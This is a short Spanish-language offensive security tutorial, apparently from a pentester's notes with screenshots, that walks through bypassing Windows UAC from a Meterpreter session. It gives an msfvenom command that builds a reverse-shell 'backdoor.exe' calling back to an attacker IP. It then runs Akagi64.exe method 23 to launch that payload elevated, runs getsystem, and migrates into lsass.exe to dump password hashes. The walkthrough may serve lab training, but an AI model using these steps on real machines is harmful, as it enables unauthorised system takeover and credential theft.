Supongamos que estamos dentro de una sesión de meterpreter de una máquina Windows:
{{pasted_image_20230731085818.png|}}
Y queremos ejecutar el comando getsystem, donde veremos que nos da error porque ha saltado el UAC:
{{pasted_image_20230731085852.png|}}
Por tanto, el primer paso será generar el payload con msfvenom en formato .exe, para pasárselo a la herramienta que usaremos más tarde:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe'
{{pasted_image_20230731090017.png|}}
Y ahora subimos este payload como también la herramienta para hacer el bypass llamada Akagi64.exe, ubicándonos en /temp porque allí tenemos permisos de escritura:
{{pasted_image_20230731092903.png|}}
{{pasted_image_20230731090056.png|}}
Una vez hecho esto, nos pondremos otra vez en escucha con metasploit para recibir esta nueva conexión:
{{pasted_image_20230731090306.png|}}
Y ahora desde la otra sesión de meterpreter, ejecutamos el Akagi64.exe pasándole la backdoor.exe que hemos subido anteriormente:
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Recibimos la conexión y ahora sí podemos ejecutar el comando getsystem:
{{pasted_image_20230731090426.png|}}
Y también podemos migrarnos al proceso lsass.exe para dumpear hashes:
{{pasted_image_20230731090942.png|}}
{{pasted_image_20230731090952.png|}}